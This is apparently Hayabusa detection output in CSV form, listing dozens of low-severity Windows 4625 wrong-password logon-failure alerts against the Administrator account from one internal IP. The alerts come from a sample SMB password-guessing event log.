2016-09-20 01:52:35.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mOLbk23zOqQLZYZU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v0tlyXqvCQJVqaB5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.291 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: npjQlHcGls5gENng | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7buinUqketmW3Ib6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Rs5gYGs6JBf2yV1J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.475 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 67hYMvtmbrmv5LHn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.521 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtV42zBnWwRCLfJS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jnaPNm28FvbFfM8L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.620 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oCEvKO14gPFHAZIA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iJJyXCm1YOI2uIAS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.717 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MNAScx4qMKxCJQdU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BKTHsNA29ZnPHCHQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CjvAb3sjN0PM8my4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.836 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wYQ6HuRSMh8DXzMf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZgejUxgojDE1kR3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2L4yO411OUnkRGWQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:35.986 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O3mGCNGFML75P7w4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.041 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6CBslPz31UACz0wR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.077 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F4Y8V0wB6unpmFXA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.125 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXSbx81GD6dYgHtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.172 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dWbnppJfJ0Ll9oLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.201 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eoUjizV5iXImPGTe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.245 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HHNG9oylnT46IObg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LUeAisNPQULjD2t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.422 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2sB5MlRw4Ox1OWdN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3WaklWtKd8QByH8M | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nzvyy6CUk43SVxZW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xeolvnD92qP1dJPO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.636 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KDvRwPbu6yQH2pEf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vxKdofXKKkCLn2n6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.730 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkO9p50Q9iFolbmb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.780 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p01SZCA784xmPMe2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.825 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XKaI3FHBbBXvVsES | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mmUk6sW8QreDIZZ5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.916 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0w9SSWaaTX7chM9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:36.961 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 46vgsyX5Wxn2rupf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.006 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PV8628a8GNKoFyzM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.047 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mksBFEFzkC08dB4o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.080 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U6QlHT6Bp63JDehd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRj4fxcRY0Esegl6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dj6zQjZwGEBo0zNt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.202 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: imfY1T2VMoaqDSUd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.243 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvPP8UYn9fLpRYl4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.289 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rFTGQ5tzNI5k58cK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F8Zj3g1WiTLx8OlJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x2Lr6j8Qt4xEmZZF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.409 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BeDRsguCovO47lKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.445 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KqrDyaFTewMPSzD9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nBVMAki1Ghpknf6p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.535 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXKhNUmBUQBTyeNM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.596 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: d1g9TVwsweaBfZgE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.645 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kWymb6ucohaBB60b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LjL0zwlZofVuWhGC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxsdzkJdnaZs5eKL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.844 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PR6EpKvbqMeoQlKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OZ3LMTtsVNI1gRO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 75bNeXwYSZPhJdJ7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:37.981 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lH6TVXSqJb1qLd3t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.021 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edDWye6c2UhKznR6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AxKUl1lynGY1ectn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vI5yUgukPBVRorJI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmR29QcBKMGVQ8rB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7luV5GfiT0v0h7D | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yA7pIDFgQbLIInqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 84g2gO0253Ut4O1O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DRkFX9WTAhBZ8jc8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WuoQAi4k3XZPaf4O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KjKMhCnbR0uFT0av | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1lfwqPB0AgTfIOt4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mJuG26pQzdjUQael | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GXwEziYTA3DkkFVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CHr6dirvkT8B9ZVs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B5eSMLiF4BsfY3xN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 64ISDuFRhR6cFYVQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
